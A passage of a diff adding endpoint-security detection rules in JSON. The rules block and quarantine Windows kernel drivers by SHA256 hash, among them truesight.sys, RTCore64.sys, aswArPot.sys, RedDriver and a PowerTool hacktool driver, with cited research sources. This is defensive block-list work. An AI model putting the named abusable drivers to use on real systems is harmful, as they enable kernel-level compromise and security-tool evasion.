+ "last_update": "2026-03-23T11:45:30.479161Z",
+ "creation_date": "2026-03-23T11:45:30.479163Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479170Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "516f0bbbc1b47ec2d83cc51be104920899193e2784a45b835fe68f864af1733b",
+ "comment": "Vulnerable Kernel Driver (aka rtkiow8x64.sys ) [https://www.loldrivers.io/drivers/998ed67c-9c20-46ef-a6ba-abc606b540b9/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "86a08d35-5419-55f3-9bdd-733700b46825",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488361Z",
+ "creation_date": "2026-03-23T11:45:31.488363Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488369Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e8a739fc928c76d792810c86641de94d9cc3ceb6a65576c6579c22d5775db51",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "86a142ca-6882-5595-aa3f-afe6ff9e6072",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490523Z",
+ "creation_date": "2026-03-23T11:45:31.490525Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490530Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "59e7ecb67e77d91f11e3ec07eef716cb99543f5715102423a1c9812fd97fac28",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "86a5eac9-3d44-5138-b12d-b59bb3276835",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485707Z",
+ "creation_date": "2026-03-23T11:45:31.485711Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485721Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dea05ba6d07c03fad203e2016f522a323ac69ddf7dd951bb675006a0711277d6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "86a68632-bbb9-5f36-9e66-77360cf1dc5d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.496074Z",
+ "creation_date": "2026-03-23T11:45:31.496076Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.496081Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2af1c26840590e3bddf622705cf2557a4781b1ac195de1df8e5ff7261ce8a6c6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "86bf9e70-aef7-5365-b648-88e4e60814ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461554Z",
+ "creation_date": "2026-03-23T11:45:30.461557Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461566Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "12a636449a491ef3dc8688c5d25be9ebf785874f9c4573667eefd42139201aa4",
+ "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "86da8630-6524-55f6-86fa-3119d2d857dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142558Z",
+ "creation_date": "2026-03-23T11:45:31.142560Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142566Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee94d33ba5d7718c87023e96dc6e263e0820fbf798168273f7f9266ab9f5aef8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "86e70f28-6163-5a96-bf9c-3ba205918805",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494763Z",
+ "creation_date": "2026-03-23T11:45:31.494765Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494770Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "727fe503800e3cc91f21bf08ab6da107804f37ea295bb72fafb5387d0030f204",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "86f02377-977d-5867-ad8e-89c9208aacc8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.986049Z",
+ "creation_date": "2026-03-23T11:45:29.986051Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.986056Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "22074c412bb82bd97768eba0cb40e451d75d969e94d0548af804aafc04ca02fd",
+ "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "86f2e6f9-dbd8-5a81-9b75-8839936abaf2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814439Z",
+ "creation_date": "2026-03-23T11:45:31.814442Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814451Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "05159d9a44a7b169ca8f314627a003203646244d05362de69b1f36b814fe2224",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "870746e4-b59d-5cce-a633-caa4e4f31a57",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969168Z",
+ "creation_date": "2026-03-23T11:45:29.969170Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65008817eb97635826a8708a6411d7b50f762bab81304e457119d669382944c3",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "870dc787-9aab-547d-ab44-81b337d5d5ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483720Z",
+ "creation_date": "2026-03-23T11:45:31.483724Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483734Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c6c44bb8ee72f922baa6acb2ad626177d51c82f9f6594c372b51ae16a99e4d4c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "871f8463-4024-558e-a089-c300e2bdf0b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832261Z",
+ "creation_date": "2026-03-23T11:45:30.832263Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832268Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e81facaffce754a2c9ecfa49aba81b236b229c682f1d284edd044ba936815285",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "871fc288-415a-5568-af82-ce0822f38b0b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820702Z",
+ "creation_date": "2026-03-23T11:45:30.820704Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820710Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bc453d428fc224960fa8cbbaf90c86ce9b4c8c30916ad56e525ab19b6516424e",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8722a1ae-2be3-511f-bc09-07ad73d2dc6c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612717Z",
+ "creation_date": "2026-03-23T11:45:29.612719Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612725Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8926be6aa6df3b5d20483e0e698ea14fa0fb760844468ed69143d7f503250349",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8733836e-a6ed-5f67-8ca0-9e5eb40fb68e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982853Z",
+ "creation_date": "2026-03-23T11:45:29.982855Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982860Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d530642aeb6524691d06b9e02a84e3487c9cdd86c264b105035d925c984823a",
+ "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "873e8945-3a91-5ec4-83da-e1238bdc3650",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460207Z",
+ "creation_date": "2026-03-23T11:45:30.460210Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460219Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5de78cf5f0b1b09e7145db84e91a2223c3ed4d83cceb3ef073c068cf88b9d444",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "874c16a7-3914-5668-8bfa-015b85f40d08",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156843Z",
+ "creation_date": "2026-03-23T11:45:31.156845Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156850Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "84af161109a74a85355f6f87e64b280950bd9bd60444f83a2915aa760b6090a5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "874e684a-ab3d-5b7f-bd88-280ca38e55e3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971784Z",
+ "creation_date": "2026-03-23T11:45:29.971786Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971792Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c7ba2720675aada538c47fa9e8950a81b6df23f63fa181680e6232651abffbef",
+ "comment": "PowerTool Hacktool malicious driver (aka kEvP64.sys) [https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/HackTool.Win64.ToolPow.A/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "875a76c4-c07c-5059-a970-87c73778c0f1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481164Z",
+ "creation_date": "2026-03-23T11:45:31.481169Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481178Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f27ae0329768838beaeed1dfcc5e9b29f43b930019cb99ab1a634f79f404c1ba",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "875c3f83-d5c3-500b-a04b-444c6511395a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816906Z",
+ "creation_date": "2026-03-23T11:45:31.816910Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816918Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d5efd09cae59c8377f6faa0b6563c8e7e362d5b0e010bcee1af9fde5862742c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "875e1e1c-58c1-5c0b-b4d0-6898d13ece60",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485737Z",
+ "creation_date": "2026-03-23T11:45:31.485741Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485751Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b067710a04f656914df1c39ece3db3a1ff33e25be0938ac4ac5beb609c7c25fd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8765bbe7-d01c-5d0c-a550-5eaffb8d695a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144466Z",
+ "creation_date": "2026-03-23T11:45:32.144468Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144474Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
